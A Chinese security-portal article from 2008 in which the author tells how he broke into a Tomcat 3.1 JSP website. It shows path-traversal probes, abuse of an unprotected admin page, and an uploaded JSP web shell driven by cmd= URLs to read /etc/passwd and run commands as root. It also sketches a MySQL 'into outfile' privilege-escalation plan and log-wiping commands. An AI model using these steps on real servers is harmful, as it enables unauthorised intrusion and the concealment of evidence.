VIP邮箱 账号: 密码:
BBS 论坛 VIP 客服
安全基地-中国最权威的网路安全资讯
首页
首页		 文章
文章		 原创
原创		 漏洞
漏洞		 工具
工具软件		 动画
动画		 投稿
投稿		 博客
博客		 光盘
光盘		 QQ
QQ专区		 FTP
FTP服务器		 VIP
VIP站点
 
站内搜索 标题搜索 简介搜索 百度搜索 Google搜索
热门资源
文章 | 最新漏洞 | 被黑站点 | 工具介绍 | 安全防范 | 病毒防护 | 行业动态 | 黑客新闻 | 安全综合 |
工具 | 加密解密 | 木马后门 | 安全扫描 | 攻击工具 | 源码编程 | 聊天工具 | 防毒杀毒 | 书籍光盘 |
动画 | 每日动画 | 入侵动画 | 破解动画 | 编程动画 | 安全配置 | 脚本动画 | 装机软件 | 其它动画 |
  当前位置: 首页 > www.cnnsc.org > 技术文章 > 安全综合  
WEB入侵jsp的过程
 
    添加时间: 2008-02-04
作者:
来源:
浏览:
 
很偶然的一个机会,看到了一个网站,页面清新,很舒服的感觉。网站是用JSP开发的,由于个人爱好,所以我决定看看系统的安全性。
telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]
返回的结果如下:

我获得了运行的WEBServer的名称"Tomcat 3.1"。我记得我曾经发现过这个版本的漏洞,并且post到bugtrap上去过。
大概是:通过".."技术可以退出WEB目录,于是:
http://target:8080/../../../../%00.jsp (不行)
http://target:8080/file/index.jsp (不行)
http://target:8080/index.JSP (不行)
http://target:8080/index.jsp%81 (不行)
http://target:8080/index.js%70 (不行)
http://target:8080/index.jsp%2581 (不行)
http://target:8080/WEB-INF/ (不行)
嗯,在试试吧!Tomcat 3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context.试一下:http://target:8080/admin/
管理员果然没有删除或禁止访问这个目录:-(失误!!!!!
接着我点"VIEW ALL CONTEXT"按钮,列出了WEB目录下的一些文件和目录的名称,我开始仔细的看了起来,一小会儿,发现了一个上传文件的组件,嘿嘿,写一个jsp文件弄上去看看。
几口咖啡的时间,我写了这么一个东东出来:

通过上传的组件将这个jsp上传到对方的WEB目录里,然后:
http://target:8080/upload/test.jsp?file=/etc/passwd
嘿嘿,密码出来啦。我只看了"/etc/passwd",并没有看"/etc/shadow",因为当时考虑webserver一般使用nobody的身份启动的,看了也白看。(失误)
接下来的过程是无聊的猜测密码,没有成功。算了,那我只有将就点,反正现在我相当于有了一个shell了嘛,猜不出密码上去,那就全当IE是我的SHELL环境吧!
再写:

然后把这个jsp又通过upload上传了上去,嘿嘿,我现在有个SHELL了。
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(我这里就不列出来了)
怎么获得root呢?经过一番搜索我发现了系统安装了mysql并且我从jsp的源代码中得到了mysql的密码:)看看是什么权限运行的mysql:
sqld">http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
显示:
root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql
嘿嘿,有办法了,系统是以root身份运行的mysql,同时我知道了mysql的密码,那我现在我可以写一个shell程序,让它create一个表,然后将我的数据放到表中,然后再使用"select ... into outfile;"的办法在系统上创建一个文件,让用户在执行su的时候,运行我的程序。(还记得apache.org有一次被入侵吗?hacker就采用的这种办法)。
然后,我再上传bindshell之类的程序,运行、获得nobody的权限,然后......再使用su root时帮忙创建的setuid shell让自己成为root.
嘿嘿,真是好办法,我都为我的想法感到得意......

接下去的事情,差点没让我吐血:
我敲了一个:http://target:8080/upload/cmd.jsp?cmd=id
显示:
uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
kao,我的这个WEB SHELL本来就是ROOT,真是服了那个管理员,也服了自己。竟然折腾了这么半天,哎!
http://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份运行的(不列出来了)

剩下来的事情:
1、删除我的telnet记录。
2、删除http的日志。
至于清除日志嘛,我使用的办法是:cat xxx |grep -V "IP" >>temp然后在把temp覆盖那些被我修改过的日志文件。
我没有更换他的页面,因为我本身也就不是什么黑客啦,更不是红客,只是个网络安全爱好者而已。所以,发封邮件告诉system admin吧!
当然,我顺便在信中提到,如果需要安盟信息科技为他提供安全服务的话,我们会非常的高兴!
 
名 字:
邮 箱:
评 论:
验证码:
查看评论